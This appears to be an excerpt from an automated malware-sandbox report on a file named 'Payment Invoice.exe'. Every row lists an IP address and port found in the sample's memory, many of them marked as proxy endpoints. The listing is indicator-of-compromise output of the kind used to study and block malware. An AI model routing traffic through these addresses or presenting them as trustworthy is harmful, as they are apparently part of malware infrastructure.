                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:44809
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:44809://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:17464
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:17464://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14791
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14791://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360;
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.23.233.210:53343
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.23.233.210:53343://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.227:56740
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.227:56740://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:10513
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:10513://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:36427
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:36427://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.246:34350
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.246:34350://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.53:14464
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.53:14464://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.131.58:30885
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.131.58:30885://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:54924
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:54924://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:58703
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:58703://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.167:36193
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.167:36193://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.36:21355
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.36:21355://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.47:13916
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.47:13916://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.48:60561://proxy0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:47354
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:47354://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:40080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:40080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:59268
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:59268://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:15143
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:15143://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10049
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10049://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13537
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13537://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14751
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14751://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1959://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2411
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2411://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:28723
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:28723://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4711
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4711://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:13141
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:13141://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19599
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19599://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:26353
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:26353://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:25491
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:25491://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:25491X
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003U
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24279
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24279://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:26087
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:26087://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:28695
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:28695://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:4495
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:4495://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14493
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14493://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:26087
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:26087://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:31033
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:31033://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3933
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3933://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:5633
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:5633://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A6E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:6879
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:6879://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7853
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7853://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9827
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9827://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:28971
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:28971://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13087
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13087://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:17145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:17145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645xDm
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:30333
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:30333://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D69000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10363
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10363://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:13175
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:13175://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318270000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:16829
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:16829://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:18129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:18129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:20001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:20001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:25917
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:25917://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26693
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26693://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31295
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31295://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31733
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31733://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:3335
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:3335://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6705
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6705://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:14325
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:14325://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:2211
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:2211://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080
